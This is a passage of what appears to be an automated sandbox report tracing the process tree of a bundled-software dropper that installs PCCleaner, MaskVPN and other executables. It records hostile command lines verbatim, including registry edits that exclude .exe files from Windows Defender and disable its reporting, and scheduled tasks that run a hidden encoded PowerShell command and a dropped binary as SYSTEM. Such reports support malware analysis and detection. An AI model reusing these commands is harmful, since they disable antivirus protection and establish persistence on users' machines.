PID 1544 wrote to memory of 4124	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4124	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4124	1544	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\--d8kxdir.exe
"C:\Users\Admin\AppData\Local\Temp\--d8kxdir.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3972

C:\Users\Admin\AppData\Local\Temp\is-09F0L.tmp\is-HJLGP.tmp
"C:\Users\Admin\AppData\Local\Temp\is-09F0L.tmp\is-HJLGP.tmp" /SL4 $8007E "C:\Users\Admin\AppData\Local\Temp\--d8kxdir.exe" 7555119 47616
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1624

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
3⤵
PID:1856

C:\Program Files (x86)\Synes\PCCleaner\PCCleaner.exe
"C:\Program Files (x86)\Synes\PCCleaner\PCCleaner.exe"
3⤵
- Executes dropped EXE
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 1052
4⤵
- Program crash
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 1028
4⤵
- Program crash
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 140
4⤵
- Program crash
PID:3108

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "PCCleaner 1"
3⤵
PID:1980

C:\Program Files (x86)\Synes\PCCleaner\PCCleaner.exe
"C:\Program Files (x86)\Synes\PCCleaner\PCCleaner.exe" ab12069f727ce074068051254b27fc34
3⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1028
4⤵
- Program crash
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1036
4⤵
- Program crash
PID:4960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1116
4⤵
- Program crash
PID:1104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1232
4⤵
- Program crash
PID:620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1240
4⤵
- Program crash
PID:4740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1324
4⤵
- Program crash
PID:3220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1328
4⤵
- Program crash
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1464
4⤵
- Program crash
PID:2964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1472
4⤵
- Program crash
PID:2832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1152
4⤵
- Program crash
PID:3004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1124
4⤵
- Program crash
PID:3516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1840
4⤵
- Program crash
PID:3548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1312
4⤵
- Program crash
PID:4624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1848
4⤵
- Program crash
PID:4948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2068
4⤵
- Program crash
PID:3500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2244
4⤵
- Program crash
PID:1884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://google.com/
4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff946346f8,0x7fff94634708,0x7fff94634718
5⤵
PID:5000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,11589263742190988108,4108633144181889844,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
5⤵
PID:2304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,11589263742190988108,4108633144181889844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:60

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,11589263742190988108,4108633144181889844,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
5⤵
PID:4124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11589263742190988108,4108633144181889844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
5⤵
PID:3980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11589263742190988108,4108633144181889844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
5⤵
PID:3736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2196,11589263742190988108,4108633144181889844,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5200 /prefetch:8
5⤵
PID:400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2196,11589263742190988108,4108633144181889844,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5340 /prefetch:8
5⤵
PID:4060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11589263742190988108,4108633144181889844,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
5⤵
PID:4668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11589263742190988108,4108633144181889844,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
5⤵
PID:4748

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,11589263742190988108,4108633144181889844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8
5⤵
PID:632

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
5⤵
- Drops file in Program Files directory
PID:2940

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff71f075460,0x7ff71f075470,0x7ff71f075480
6⤵
PID:3820

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,11589263742190988108,4108633144181889844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1964
4⤵
- Program crash
PID:2788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2040
4⤵
- Program crash
PID:2876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2152
4⤵
- Program crash
PID:4572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2328
4⤵
- Program crash
PID:1332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2308
4⤵
- Program crash
PID:2260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2264
4⤵
- Program crash
PID:1844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1984
4⤵
- Program crash
PID:3556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2008
4⤵
- Program crash
PID:1884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2036
4⤵
- Program crash
PID:1844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1932
4⤵
- Program crash
PID:4572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2036
4⤵
- Program crash
PID:4664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2340
4⤵
- Program crash
PID:3976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2372
4⤵
- Program crash
PID:1200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1928
4⤵
- Program crash
PID:3716

C:\Users\Admin\AppData\Local\Temp\PLQzp53w\z9lPVDj9zZUU2uf3mPY.exe
C:\Users\Admin\AppData\Local\Temp\PLQzp53w\z9lPVDj9zZUU2uf3mPY.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2940

C:\Users\Admin\AppData\Local\Temp\CQlm2anS\yRsXtHTgGrW6NY8ct.exe
C:\Users\Admin\AppData\Local\Temp\CQlm2anS\yRsXtHTgGrW6NY8ct.exe /VERYSILENT
4⤵
- Executes dropped EXE
PID:4352

C:\Users\Admin\AppData\Local\Temp\is-4VQ7M.tmp\yRsXtHTgGrW6NY8ct.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4VQ7M.tmp\yRsXtHTgGrW6NY8ct.tmp" /SL5="$80284,4768834,780800,C:\Users\Admin\AppData\Local\Temp\CQlm2anS\yRsXtHTgGrW6NY8ct.exe" /VERYSILENT
5⤵
- Executes dropped EXE
- Drops startup file
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4572

C:\Program Files (x86)\Proxy2Service\client.exe
"C:\Program Files (x86)\Proxy2Service\client.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2384
4⤵
- Program crash
PID:2936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1952
4⤵
- Program crash
PID:2936

C:\Users\Admin\AppData\Local\Temp\HJKtqljk\aTMvS4.exe
C:\Users\Admin\AppData\Local\Temp\HJKtqljk\aTMvS4.exe /silentmix SUB=ab12069f727ce074068051254b27fc34
4⤵
- Executes dropped EXE
PID:1236

C:\Users\Admin\AppData\Local\Temp\is-F7SM1.tmp\is-F8424.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F7SM1.tmp\is-F8424.tmp" /SL4 $2023C "C:\Users\Admin\AppData\Local\Temp\HJKtqljk\aTMvS4.exe" 5289648 49152 /silentmix SUB=ab12069f727ce074068051254b27fc34
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:5144

C:\Program Files (x86)\Data Recovery\rdrhfsp.exe
"C:\Program Files (x86)\Data Recovery\rdrhfsp.exe" /silentmix SUB=ab12069f727ce074068051254b27fc34
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:5276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "rdrhfsp.exe" /f & erase "C:\Program Files (x86)\Data Recovery\rdrhfsp.exe" & exit
7⤵
PID:5624

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "rdrhfsp.exe" /f
8⤵
- Kills process with taskkill
PID:5732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2384
4⤵
- Program crash
PID:5152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2340
4⤵
- Program crash
PID:5408

C:\Users\Admin\AppData\Local\Temp\OHdR3rwF\Loy6GQKfoZWtolK.exe
C:\Users\Admin\AppData\Local\Temp\OHdR3rwF\Loy6GQKfoZWtolK.exe /S /site_id=690689
4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:5400

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:5636

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
PID:5764

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
7⤵
PID:5876

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:5940

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:5792

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:5896

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:5928

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
PID:5984

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gmwEfnuvv" /SC once /ST 02:57:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:6108

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gmwEfnuvv"
5⤵
PID:5100

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gmwEfnuvv"
5⤵
PID:2132

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bBozjCWLIxbVSsixmx" /SC once /ST 15:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MkvMclGAJfgCmuAao\qcyaUAefYhvwkdV\QoDXHqn.exe\" YP /site_id 690689 /S" /V1 /F
5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:60

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2080
4⤵
- Program crash
PID:5584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2096
4⤵
- Program crash
PID:5828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2404
4⤵
- Program crash
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2408
4⤵
- Program crash
PID:6120

C:\Users\Admin\AppData\Local\Temp\C4cPtPB3\vpn.exe
C:\Users\Admin\AppData\Local\Temp\C4cPtPB3\vpn.exe /silent /subid=509xab12069f727ce074068051254b27fc34
4⤵
- Executes dropped EXE
PID:4304

C:\Users\Admin\AppData\Local\Temp\is-R0QO0.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-R0QO0.tmp\vpn.tmp" /SL5="$70206,15170975,270336,C:\Users\Admin\AppData\Local\Temp\C4cPtPB3\vpn.exe" /silent /subid=509xab12069f727ce074068051254b27fc34
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:1364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
6⤵
PID:5732

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:5812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
6⤵
PID:508

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5636

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
7⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
PID:5844

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1964

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2156
4⤵
- Program crash
PID:5168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2208
4⤵
- Program crash
PID:5096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2436
4⤵
- Program crash
PID:5308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2428
4⤵
- Program crash
PID:5584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2436
4⤵
- Program crash
PID:5928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2448
4⤵
- Program crash
PID:6024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2212
4⤵
- Program crash
PID:3692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1992
4⤵
- Program crash
PID:428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2408
4⤵
- Program crash
PID:5264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1944
4⤵
- Program crash
PID:4548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2332
4⤵
- Program crash
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1976
4⤵
- Program crash
PID:1076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2324
4⤵
- Program crash
PID:3328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2332
4⤵
- Program crash
PID:5608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 2032
4⤵
- Program crash
PID:1636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1844
4⤵
- Program crash
PID:5296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4672 -ip 4672
1⤵
PID:2996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4672 -ip 4672
1⤵
PID:1280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4672 -ip 4672
1⤵
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1060 -ip 1060
1⤵
PID:2356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1060 -ip 1060
1⤵
PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1060 -ip 1060
1⤵
PID:1788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1060 -ip 1060
1⤵
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1060 -ip 1060
1⤵
PID:544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1060 -ip 1060
1⤵
PID:2740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1060 -ip 1060
1⤵
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1060 -ip 1060
1⤵
PID:3772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1060 -ip 1060
1⤵
PID:3056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1060 -ip 1060
1⤵
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1060 -ip 1060
1⤵
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1060 -ip 1060
1⤵
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1060 -ip 1060
1⤵
PID:5024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1060 -ip 1060
1⤵
PID:2864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1060 -ip 1060
1⤵
PID:3664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1060 -ip 1060
1⤵
PID:1632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1060 -ip 1060
1⤵
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1060 -ip 1060
1⤵
PID:1980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1060 -ip 1060
1⤵
PID:1496

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1060 -ip 1060
1⤵
PID:1732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1060 -ip 1060
1⤵
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1060 -ip 1060
1⤵
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1060 -ip 1060
1⤵
PID:4756

C:\Windows\SysWOW64\WerFault.exe
